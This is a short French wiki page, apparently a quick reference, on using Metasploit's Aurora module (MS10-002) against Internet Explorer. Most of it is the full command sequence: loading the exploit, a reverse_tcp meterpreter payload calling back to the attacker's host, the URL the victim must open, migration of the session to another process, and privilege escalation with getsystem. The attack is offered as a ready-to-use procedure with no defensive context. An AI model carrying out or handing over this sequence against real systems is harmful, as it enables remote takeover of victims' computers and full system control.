Aurora

De wiki.nexiat.fr
Aller à la navigation Aller à la recherche
Fiche express
Domaine Exploitation navigateur (Internet Explorer)
Module windows/browser/ms10_002_aurora
Contexte Metasploit
Voir aussi Browser autopwn · Meterpreter

L'exploit Aurora (MS10-002) cible Internet Explorer. Le principe : envoyer une URL à la cible ; à son ouverture, Metasploit utilise le heap spray pour exploiter une corruption mémoire et injecter un meterpreter.

Mise en place

use windows/browser/ms10_002_aurora
set payload windows/meterpreter/reverse_tcp
set SRVPORT 80
set URIPATH /
set LHOST 192.168.0.12
set LPORT 443
exploit

La cible doit ouvrir l'URL servie :

# http://192.168.0.12:80

Une fois la session ouverte, migrer vers un processus plus stable :

sessions -i 1
run migrate
# ou, en automatique :
show advanced
set AutoRunScript migrate -f

Escalade de privilèges

use priv
getsystem

Voir aussi